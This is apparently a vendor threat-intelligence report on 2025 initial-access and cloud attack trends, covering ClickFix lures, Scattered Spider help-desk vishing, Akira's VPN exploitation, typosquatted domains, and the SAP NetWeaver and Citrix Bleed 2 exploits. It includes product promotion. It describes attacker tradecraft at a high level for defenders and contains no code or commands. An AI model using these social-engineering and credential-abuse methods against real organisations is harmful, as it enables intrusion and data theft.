Initial Access Trends

The top initial access techniques in customer incidents have remained consistent since 2023. While supply-chain compromise and replication through removable media rounded out the top 5, the leading trio again jostled for the top spot. These tactics stay popular because they exploit human trust, curiosity, and moments of inattention at a scale defenders can’t reliably stop in real time.

What changed in 2025 wasn’t the “what,” but the “how.” Attackers executed these staples differently, with social engineering acting as the common accelerator across nearly every major initial access path.

The most impactful initial access methods covered in the following sections all lean on this theme: The fastest path to initial access is through people, not novelty. AI likely supported this shift by eliminating language barriers and lowering the effort required to craft convincing narratives.

ClickFix:
From Copy-Paste to Compromise

“ClickFix” facilitated the delivery of 59% of the top malware families in 2025, showing that initial access lures have moved beyond “click the link” or “open the attachment.” ClickFix blends phishing-style social engineering (coaching users into taking a harmful action) with drive-by compromise (where the “trigger” can be as simple as visiting a webpage). And because the activity runs through legitimate system functions, it can slip past email gateways, sandboxes, and some endpoint detection systems—shifting the fight from perimeter prevention to defense in depth and catching follow-on endpoint and identity behavior that ClickFix sets in motion.

Quiet Debut to Industrialized Abuse

First observed in October 2023, ClickFix is a social engineering technique that turns “troubleshooting” into an attack. Victims are tricked into running malicious commands themselves, often under the guise of completing a CAPTCHA, clearing a browser security warning, or installing a critical system update (see Figure 1).

By early 2025, underground recruitment posts were advertising for ClickFix developers and “specialists.” After that, we observed a 200% surge in ClickFix-related activity as adversaries began industrializing the technique to scale it—operating more like legitimate businesses by hiring talent to expand capacity and increase returns. By late 2025, the prominent ransomware group “Interlock” had adopted ClickFix as a primary initial access method, a strong indication that the technique isn’t just a nuisance, but effective even for mature ransomware-as-a-service (RaaS) operations.

ClickFix is even outgrowing its Windows roots. We investigated incidents where macOS users were targeted via ClickFix, leading to the delivery of the “Atomic” macOS infostealer. By the end of 2025, the same playbook was being used to deploy payloads ranging from ransomware to cryptocurrency miners, showing how a single delivery method can support very different objectives.

* Figure 1: Common ClickFix Variations

Why Traditional Awareness Fails Against ClickFix

ClickFix is best countered by shifting attention from file- or link-based detections to risky user-initiated execution. Because the technique pushes targets to run commands through legitimate interfaces (like the Windows Run dialog) and often hides behind trusted brands like Cloudflare, Google Chrome, and Microsoft, defenses are strongest when they can detect and contain abnormal command execution and follow-on behavior holistically across endpoint and identity telemetry.

Traditional security awareness still matters, but the guidance must change. “Don’t click suspicious links” won’t catch ClickFix. Training should condition users to treat unexpected CAPTCHAs, browser warnings, and “urgent” update prompts as potential attack steps—especially in industries where web-based workflows and self-service troubleshooting are routine (such as the technology, finance, health care, and education sectors).

AI adds both opportunity and risk to this playbook. While we haven’t seen AI-generated ClickFix lures at scale yet, ClickFix is well-suited for AI augmentation, from generating personalized fake error messages based on a target’s browsing behavior to automatically creating localized versions in multiple languages.

To get in front of AI-based ClickFix attacks, organizations should pair user awareness with AI-assisted behavioral detection that can spot anomalous user actions consistent with ClickFix execution, enabling faster investigation and response as lure quality improves.

Scattered Spider’s Social Engineering Drives Valid Account Abuse

ClickFix cast a wide net in 2025, but the year’s highest-impact intrusions took a sharper, more direct path: the IT help desk, i.e., the custodians of access. Adversaries manipulated support staff into handing over valid credentials, then blended into normal traffic and sidestepped the alarms that noisy exploits typically trigger. By reducing technical reliance in favor of simpler, bolder, and faster tactics, attackers like “Scattered Spider” proved that the deadliest route to initial access is a legitimate identity—willingly handed over by someone who’s been deceived.

Scattered Spider Masters Human Exploitation

This identity-centric playbook has become the signature move of the Scattered Spider collective (aka “Octo-Tempest,” “UNC3944”). Active since 2022, this native-English-speaking group applied its tradecraft en masse in 2025, shifting from targeted strikes to widespread campaigns. The group’s focus stayed consistent across campaigns: Compromise platforms that provide centralized access, then pivot across the entire environment, hitting the finance, insurance, retail trade, and airline sectors in waves.

In multiple engagements, we saw attackers coerce IT administrators into resetting passwords or registering new MFA devices, effectively converting legitimate identities into attacker-controlled accounts. By impersonating executives, they exploited the inherent trust placed in internal requests to bypass verification protocols. In one investigated incident, Scattered Spider impersonated a CFO and used pre-collected personal information—such as date of birth and Social Security Number (SSN) fragments—to pass identity verification checks.

High-ranking employees often have extensive public-facing internet footprints, giving attackers the raw material to prepare, remove common roadblocks, and secure high-level privileges upfront. In one incident, once those permissions were in place, the pivot from initial entry to full system compromise took just 4 minutes.

In our analysis of Scattered Spider voice phishing (vishing) calls, we found considerable expertise in psychological manipulation: confident corporate jargon, urgent tones to build rapport, and accents that occasionally “faded” or sometimes shifted to match the recipient. When help-desk agents pushed back, the attackers persisted, cycling calls until they reached someone who yielded. Their native English fluency made these interactions more credible and harder to dismiss than traditional vishing.

Social Engineering Featured in 26% of Incidents in 2025

In 2025, instead of bypassing security controls, attackers convinced people to disable them. Using employee impersonation and vishing, this technique, like ClickFix, reinforced one of the year’s defining patterns: attackers manipulating human decisions to gain access. In fact, 1 in 4 incidents we responded to in 2025 involved social engineering. By turning trusted organizational processes into tools for compromise, these attacks demonstrate that even the most expensive security stacks struggle against a valid account issued to the wrong person.

As long as human verification remains the fallback for account recovery and MFA resets, social engineering will persist. Preventative verification isn’t foolproof, so the priority must shift to detecting the signals that follow a successful help-desk compromise—such as a password reset and immediate lateral movement—and responding in seconds, before valid access turns into a full-scale breach.

Akira Exploits Public-Facing Devices: M&A Creates Hidden Risk

Exploitation of public-facing devices remains a reliable entry point. In 2025, we saw the “Akira” ransomware group exploiting unpatched SonicWall VPN appliances inherited through mergers and acquisitions (M&A) as a fast, low-friction entry point into larger enterprises. One overlooked remote-access device, still used by employees, contractors, or third parties, can become a direct path to domain compromise and ransomware deployment before the acquired environment is fully brought under standard controls.

Akira’s VPN Fast Track to Ransomware Deployment

From June through October 2025, we investigated a wave of Akira incidents relentlessly targeting this gap, where attackers gained access by exploiting unpatched vulnerabilities such as CVE-2024-40766 or brute-forcing weak credentials, and then pivoted into enterprise environments.

Akira, a financially motivated ransomware group active since 2023 and known for double extortion, consistently targets remote connectivity infrastructure because it is trusted; always on; and heavily used by employees, contractors, and third parties.

To stay under the radar during these incidents, Akira masked authentication attempts behind virtual private servers (VPS), blending into legitimate traffic and making detection significantly more difficult for defenders relying on geo-blocking or basic IP reputation filtering.

Across multiple incidents, once the group established access, attackers reached a domain controller in an average of just 9.3 hours—and in some cases in as little as 5 hours. From there, lateral movement to ransomware deployment averaged just 1 hour.

The M&A Risk Factor

Across the Akira-associated incidents we investigated, M&A was a consistent enabling factor. Akira repeatedly breached larger enterprises through inherited devices—assets that often sit in a governance gray zone during transition periods and carry forward legacy configurations, stale credentials, and delayed patching. These inherited edge devices become “unknown” or poorly monitored internet-facing entry points that attackers can use to bypass the acquiring company’s stronger, centralized controls.

SonicWall appears in these scenarios largely because of its ubiquity in mid-market environments, driven by affordability and ease of use. We can’t say with certainty whether Akira deliberately targeted SonicWall or the M&A process itself, but the pattern fits how ransomware groups operate. They gravitate towards targeting remote-access surfaces that are widely deployed, internet-exposed, and unevenly patched—conditions that worsen during rushed migrations and integration. This reality reflects the inherent risk of managing widespread remote-access fleets, not a flaw unique to any one vendor.

Incomplete asset inventories and patchy logging create blind spots that even robust security stacks cannot cover. Organizations should treat inherited infrastructure as part of the external attack surface from day one. Use automated discovery tools to immediately inventory internet-facing devices and identities brought in through M&A; force credential resets; patch aggressively; and bring logging and EDR visibility online (including VPN and authentication telemetry) before expanding connectivity.

Fundamentally, this is a problem of speed and coverage: If you can’t quickly discover what assets you own and continuously confirm they’re patched and monitored, attackers will.

Typosquatting Still Works
and It Scales into SaaS

Fake domains remain one of the most reliable paths to initial access because phishing basics still win. In 2025, we repeatedly saw threat actors weaponize typosquatted (deceptive lookalike) domains to steal credentials and OAuth tokens, using them to skip authentication checks and move directly into high-value software-as-a-service (SaaS) and cloud environments. By registering lookalike domains tailored to specific industries and services, attackers improved success rates and amplified the impact of each campaign.

This tactic isn’t likely to fade. It’s low-cost, consistently effective, and, when it succeeds, the access can look legitimate long enough for data theft to begin.

ShinyHunters Targets SaaS Platforms

One of the most impactful examples we tracked was a 4-month campaign by financially motivated threat group “ShinyHunters” targeting Salesforce customer relationship management (CRM) credentials. ShinyHunters gained notoriety in 2020 through a series of large-scale data breaches and extortion campaigns targeting global brands. In this campaign, we saw ticket-themed lures and domains that mimicked trusted support workflows and internal tools, exploiting predictable behavior like clicking “support” links without hesitation.

* Figure 2: A screenshot of a sign up form

Our research revealed a pattern that helps forecast likely targeting. Domains were registered in clusters, often shortly before public reporting on victim breaches, and frequently tailored to specific brands. They were carefully crafted to appear authentic, relying on slight spelling, structure, or branding variations. For example, we identified domains registered just days before a reported breach affecting a major fashion outlet:

• ticket-lvmh[.]com
• ticket-dior[.]com
• ticket-louisvuitton[.]com

Domains Blurred Across ShinyHunters, Scattered Spider, and Scattered Lapsus$ Hunters

Through our investigation, we found evidence suggesting overlap or coordination between ShinyHunters and Scattered Spider, based on domains impersonating technology vendors and access workflows . Many of the domains used terms like “helpdesk” and “SSO” to mimic sign-on portals, VPNs, and IT support systems, intentionally aiming for credentials that unlock infrastructure-level access.

Later in the year, we saw a resurgence in this technique when we identified over 40 typosquatted domains impersonating Zendesk portals. In the process, we observed signs of a new coalition known as “Scattered Lapsus$ Hunters” (which likely involves members of Scattered Spider, ShinyHunters, and hacking group “Lapsus$”) operating the same playbook: Registering fake domains targeting SaaS platforms that unlocked downstream customer data and internal workflows, while early access still looked like normal sign-in activity. ShinyHunters’ launch of a data-leak site reinforced how quickly credential theft can turn into an end-to-end extortion pipeline.

The biggest advantage of this technique is its modularity. One group can build and scale the lure and domain ecosystem while another operationalizes the access for data theft or extortion. That blurs “who did what,” but more importantly, it accelerates campaigns and widens the blast radius, because proven infrastructure and playbooks can be shared, reused, or franchised across victims and sectors.

Fake domains aren’t new to defenders. They’re durable attacker infrastructure that provides early warning, victim forecasting, and low-friction access. Organizations need visibility into internet-facing identity and SaaS access paths—and the ability to rapidly validate and contain suspicious authentication tied to newly observed lookalike domains before phished access turns into data theft and extortion.

Your Strategy for Combatting
Deception and Identity Threats

Organizations need adaptive defenses to prepare for and tackle modern initial access techniques, whether that means neutralizing ClickFix-style deception, countering Scattered Spider’s help-desk social engineering, or staying ahead of evolving phishing tactics.

Automate and Streamline Phishing Responses

Phishing (with links or attachments) remained one of the top initial access risks in 2025. Proactive employee training and simulations reduce human error, but they don’t close the gap on their own. Organizations also need tools like GreyMatter Phishing Analyzer that can automatically and holistically detect, investigate, and contain phishing attempts that bypass secure email gateways and land in user inboxes.

• Cut the time-to-verdict on a reported phish: Use AI to automate deconstruction, analysis, and enrichment of user-reported emails so security teams can determine malicious vs. benign in minutes, thereby reducing the window for initial access.
• Limit impact after a click: Coordinate response across email, network, and endpoint controls—including removing malicious messages, blocking payload delivery, and isolating affected devices—to prevent a single interaction from escalating into credential theft or follow-on compromise.
• Contain the campaign, not just one email: Scope at the campaign level to identify who received the message and who interacted with it so security teams can prioritize affected users, remediate at scale, and prevent repeat compromise.

Conduct Threat Hunting to Close Identity Hygiene Gaps

Attackers move too fast for purely reactive defense. The only way to stay protected is by implementing a proactive and predictive security operations program. Threat hunting helps surface and prioritize hygiene gaps that enable identity- and phishing-based intrusions—and drives remediation through enforcement controls and repeatable workflows. Examples of threat hunting packages available to GreyMatter customers include:

• Cleartext Passwords in Document: Identifies files containing plaintext credentials stored on user devices, often a symptom of missing password vault adoption. Using endpoint telemetry (for example syslog, Sysmon, or EDR), this package finds documents with cleartext passwords before attackers can enumerate and abuse them during post-compromise reconnaissance, allowing security teams to remediate risky files and enforce password vault adoption.
• Spearphishing Attachments: Flags spearphishing attempts using uncommon but business-relevant file extensions designed to evade filters. Using email gateway and endpoint telemetry, this package helps organizations rapidly identify higher-risk mail, correlate telemetry, and prioritize remediation (e.g., quarantine/purge, user follow-up, endpoint review).
• MFA Modification: Surfaces high-risk MFA events (new device registrations, resets) and highlights anomalous changes that can indicate account takeover. Use it to verify procedural compliance, spot suspicious identity changes early, and trigger response actions (e.g., session revocation, credential resets, access reviews).

Attackers Exploit the Old and Forge the
New in the 2025 Vulnerability Scene

Two of the year’s big vulnerability stories showed both ends of the exploitation spectrum: A truly novel zero-day weaponized within days, and an “infamous” vulnerability resurfacing with updated tradecraft and faster timelines. The enterprise risk is the same; that is, once a high-impact exposure becomes usable at scale, multiple operators pile on quickly. That forces defenders to rely on defense in depth and fast containment rather than a single control, signature, or patch window.

ReliaQuest-Discovered SAP NetWeaver Zero-Day Sparked an Exploitation Snowball

In April 2025, ReliaQuest identified a zero-day vulnerability in the technology integration platform SAP Netweaver (CVE-2025-31324) with a CVSS score of 10.0. Initially suspected to be a remote file inclusion issue, we quickly confirmed it was an unrestricted file upload vulnerability. SAP subsequently released a patch. Within days, multiple threat actors adopted the same exploitation path, but post-exploitation tradecraft diverged rapidly, creating a snowball effect where one flaw produced many distinct intrusion patterns.

CVE-2025-31324 shows how attackers adapt by turning a single exploit into many variants that evolve over time. High-impact enterprise vulnerabilities deliver immediate ROI for attackers, and rapid reuse, combined with shifting tool sets, complicates attribution and overwhelms defenses by inspiring a chain reaction of exploitation. This preference also showed up in our analysis of vulnerability-related chatter on cybercriminal forums: Discussion and exploit sales focused on widely deployed enterprise security and infrastructure platforms, where one exploit can turn into thousands of potential victims.

* Figure 3: SAP Scattered Lapsus$ Hunters POC post

Across attacks tied to this zero-day, the initial access method stayed consistent. Adversaries used the unrestricted file upload flaw to gain code execution and implant web shells, establishing a foothold deep in the environment. After entry, attacks got more complex. In some cases, attackers used the Heaven’s Gate anti-detection technique to execute 64-bit payloads from a 32-bit context, reducing the effectiveness of EDR coverage focused narrowly on the 32-bit subsystem.

Once inside, operating under the radar, the tools used varied between actors. We saw payloads consistent with Brute Ratel (a commercial red-team command-and-control [C2] framework often abused by threat actors) and “PipeMagic,” which established backdoors via Windows-named pipes, leveraging a built-in communication channel that evades network-based detection. The gap between a relatively simple entry method and highly advanced post-exploitation tools suggests a decoupled kill chain. This aligns with initial access broker (IAB) behavior: Secure entry and then sell access to other operators who bring their own tool kits.

This potential rotation of actors and snowball effect created a muddled landscape for defenders. Even with a consistent exploit vector, the post-exploitation footprint shifted with every new operator. Defenders couldn’t simply hunt for a single C2 signature or tool set to scope the breach, because the post-exploitation “smoke” changed depending on who had bought the fire.

When a vulnerability is new and exploitation is active, resilience can’t depend on a single control. Layer your defenses—rapid exposure identification and mitigation, strong identity controls, network segmentation, and behavior-based detection—to establish defense in depth. This approach holds even when any single layer fails. What matters then is detecting what attackers do after entry (establish persistence, escalate privileges, and move laterally), not which tool they choose.

Citrix Bleed 2 Showed Old Vulnerabilities Still Have Teeth

2025 also showed us that old vulnerabilities matter just as much as new flaws. Instead of fading, they become playbooks. Attackers reuse what works, adjust the tradecraft, and apply it at scale.

We saw this play out in the days leading up to the public disclosure of Citrix Bleed 2 (CVE-2025-5777). We noticed suspicious activity on a customer’s Citrix NetScaler appliance. We observed unexpected session terminations, abnormal session reuse across multiple IP addresses, and traffic patterns originating from data-center hosting providers.

Further investigation confirmed that attackers had already weaponized the flaw. By extracting session tokens from memory, they bypassed authentication and appeared inside the network as legitimate users, then quickly pivoted into Active Directory (AD) reconnaissance and lateral movement—all before a patch was widely available.

This is why “infamous” vulnerabilities matter long after their disclosure. The original Citrix Bleed (2023) was more than just a one-time incident wave. It taught attackers where to look, what success looks like operationally, and how defenders tend to respond. When similar conditions emerged again, threat actors moved quickly, even without a public proof of concept (PoC).

Patching remains essential, but it doesn’t eliminate risk on its own. And it doesn’t always arrive before exploitation begins. Attackers iterate on familiar exploit themes and move quickly against exposed systems, creating a recurring cycle of old techniques and new CVEs. And with advancements in AI, these cycles are likely to accelerate, making it faster for attackers to identify and exploit recurring weaknesses in complex attack surfaces.

Defenders need sustained visibility into exploitation behavior and the ability to respond before session hijacking or lateral movement turns an exposed service into a breach.

Small Missteps and Big Consequences in
Cloud Misconfigurations

New CVEs and high-profile vulnerabilities can be weaponized at speed, but the cloud incidents we investigated in 2025 followed a simpler pattern. Attackers didn’t need a breakthrough vulnerability when misconfigurations and over-privileged identities provided an easier path.

Cloud Risk Is Driven by IAM Abuse and Compute Misconfiguration

Across incidents in customer cloud environments last year, the highest-impact activity mapped back to 2 preventable failures:

Identity and Access Management: Identity and Access Management (IAM) issues emerged as the primary source of cloud risk, accounting for 44% of alerts; within those, 52% involved privilege escalation. Nearly half of verified cloud incidents involved abuse of valid credentials, often tied to over-privileged cloud identities. Wildcard permissions (*) and excessive administrative roles remain prime targets for attackers as they make escalation and high-impact access straightforward.

Process breakdowns: Compute resources (virtual machines [VMs], serverless functions, and containers) were involved in 43% of incidents, often through misconfigurations like exposed storage buckets, unpatched vulnerabilities, and overly permissive network rules. Mismanaged permissions in Continuous Integration and Continuous Delivery (CI/CD) pipelines were particularly dangerous, enabling lateral movement across environments. By compromising a single pipeline configuration, attackers could hijack the automated deployment process, turning legitimate software delivery tools into a mechanism for pushing malicious code or infrastructure changes directly into production.

Key Misconfigurations Driving Cloud Risk

Attackers thrive on gaps in visibility, access control, and resource protection. Our investigations revealed that the most common missteps driving high-risk incidents included public exposure of sensitive resources and excessive privileges on vulnerable VMs.

Cloud interdependence compounds the effect of any misconfiguration. A misconfigured VM can become a gateway into CI/CD pipelines, collaboration tools, and automation frameworks. Attackers use that interconnectedness to turn a small foothold into broad compromise.

* Figure 4: Top cloud risks and misconfigurations

Exploiting the Cloud One Credential at a Time

Many cloud security issues boil down to a single leaked credential. With valid credentials in hand, attackers can use automated tools to rapidly scan, validate, and exploit secrets, then pivot across interconnected cloud services. Organizations often struggle to detect credential misuse in real time due to visibility gaps in IAM logs and API usage patterns. These are blind spots that attackers can use to operate undetected for extended periods.

In one incident we analyzed, attackers used the legitimate open-source tool TruffleHog to scan public repositories and Slack channels for forgotten AWS keys. After validating them, they used the GetCallerIdentity command to map permissions and identify over-privileged accounts.

From there, they located and drained sensitive data from S3 buckets while simultaneously scanning internal Slack workspaces for additional tokens. By abusing trust relationships in CI/CD pipelines, they moved laterally across services, effectively turning the organization's own automation infrastructure into the attack path.

A strong perimeter doesn’t matter if valid credentials are scattered inside the environment. One key left in a chat log is enough to bypass defenses, escalate privileges, and take full control of a cloud environment. Cloud misconfigurations can drive data breaches, regulatory fines, reputational damage, and operational disruption.

Your Strategy for Combatting
Vulnerabilities and Cloud Threats

Organizations can stay ahead of a volatile vulnerability landscape and complex cloud risk by combining comprehensive visibility, actionable intelligence, and AI-driven automation. This ensures exposures are identified, prioritized, and remediated before attackers can exploit them.

Move Beyond Observation and Resolve Hidden Risk Proactively

You can’t reduce risk you can’t see. A unified view across on‑premises, cloud, and hybrid systems helps uncover hidden assets, shadow IT, and misconfigurations that attackers target first. Reducing exposure to rapidly exploited vulnerabilities and emerging zero-days with tools like GreyMatter Discover helps businesses shrink their reachable attack surface.

• Eliminate silos with a unified asset inventory: Maintain a continuously updated, de-duplicated inventory of assets and identities so “unknown” systems don’t become easy footholds during vulnerability exploitation.
• Prioritize what matters by linking criticality to exposure: Combine asset importance with vulnerability and misconfiguration context to focus remediation on issues most likely to cause immediate impact, especially high-risk cloud exposures like publicly accessible storage and over-privileged identities.
• Move from finding to fixing with validated remediation: Operationalize remediation workflows, confirm fixes through continuous reassessment, and identify coverage gaps (e.g., missing EDR or insufficient logging) so high-risk assets are brought under governance before they’re exploited

Monitor Your External Attack Surface

Pair internal exposure management with external threat monitoring from a service like GreyMatter Digital Risk Protection to spot vulnerability and zero-day signals before they translate into active exploitation. This enables faster prioritization of mitigations and reduces the likelihood of compromise.

• Prioritize patching based on real-world attacker interest: Connect external exploit chatter and sales activity on cybercriminal forums to your actual technology footprint to identify which known vulnerabilities are most likely to be targeted.
• Monitor for pre-disclosure zero-day signals: Track weaponization cues and exploit sales on the open, deep, and dark web to stand up compensating controls and targeted monitoring before official details are released.
• Reduce cloud and identity takeover risk through targeted hardening: Link external discussion of cloud misconfigurations and identity abuse to your internal configurations so security teams can focus on the most consequential tenant settings, application registrations, and privileged roles, closing the highest-impact paths to compromise first.